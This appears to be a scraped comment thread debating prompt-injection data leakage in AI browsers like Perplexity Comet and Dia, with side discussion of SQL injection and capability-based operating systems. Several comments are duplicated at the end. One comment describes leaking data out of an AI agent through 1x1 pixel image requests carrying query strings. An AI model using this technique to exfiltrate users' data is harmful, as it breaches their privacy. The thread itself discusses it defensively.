How does Perplexity Comet and Dia not suffer from data leakage like this? They seem to completely violate the lethal trifecta principle and intermix your entire browser history, scraped web page data and LLM’s.
do_not_redeem · 19m ago
Because nobody has tried attacking them
Yet
Or have they? How would you find out? Have you been auditing your outgoing network requests for 1x1 pixel images with query strings in the URL?
pryelluw · 1h ago
Im still fixing sql and db command injection through APIs from juniors and now vibe coders. This just adds more work to do.
The ITT/TTI and TTS/STT have been particularly annoying to protect against. I don’t feel we’ve matured enough to have solid protections against such vectors yet.
wglb · 50m ago
Write a prompt that asks to detect sql injection in each source code model. Or other security issues.
siisisbab · 46m ago
Why not just ask the original prompt to make no mistakes?
pixl97 · 22m ago
Because most of its training data is mistakes or otherwise insecure code?
hobs · 35m ago
Again, this is something most good linters will catch, Jetbrains stuff will absolutely just tell you, deterministically, that this is a scary concatenation of strings.
No reason to use a lossy method.
mikewarot · 1h ago
Maybe this will finally get people over the hump and adopt OSs based on capability based security. Being required to give a program a whitelist at runtime is almost foolproof, for current classes of fools.
yorwba · 43m ago
People will use the equivalent of audit2allow https://linux.die.net/man/1/audit2allow and not go the extra mile of defining fine-grained capabilities to reduce the attack surface to a minimum.
zahlman · 36m ago
Can I confidently (i.e. with reason to trust the source) install one today from boot media, expect my applications to just work, and have a proper GUI experience out of box?
mikewarot · 13m ago
No, and I'm surprised it hasn't happened by now. Genode was my hope for this, but they seem to be going away from a self hosting OS/development system.
Any application you've got assumes authority to access everything, and thus just won't work. I suppose it's possible that an OS could shim the dialog boxes for file selection, open, save, etc... and then transparently provide access to only those files, but that hasn't happened in the 5 years[1] I've been waiting. (Well, far more than that... here's 14 years ago[2])
This problem was solved back in the 1970s and early 80s... and we're now 40+ years out, still stuck trusting all the code we write.
"One of my weirder hobbies is helping coin or boost new terminology..." That is so fetch!
jgalt212 · 18m ago
Simon is a modern day Brooksley Born, and like her he's pushing back against forces much stronger than him.
scarface_74 · 1h ago
I have been skeptical from day one of using any Gen AI tool to produce output for systems meant for external use. I’ll use it to better understand input and then route to standard functions with the same security I would do for a backend for a website and have the function send deterministic output.
Yet
Or have they? How would you find out? Have you been auditing your outgoing network requests for 1x1 pixel images with query strings in the URL?
The ITT/TTI and TTS/STT have been particularly annoying to protect against. I don’t feel we’ve matured enough to have solid protections against such vectors yet.
No reason to use a lossy method.
Any application you've got assumes authority to access everything, and thus just won't work. I suppose it's possible that an OS could shim the dialog boxes for file selection, open, save, etc... and then transparently provide access to only those files, but that hasn't happened in the 5 years[1] I've been waiting. (Well, far more than that... here's 14 years ago[2])
This problem was solved back in the 1970s and early 80s... and we're now 40+ years out, still stuck trusting all the code we write.
[1] https://news.ycombinator.com/item?id=25428345
[2] https://www.quora.com/What-is-the-most-important-question-or...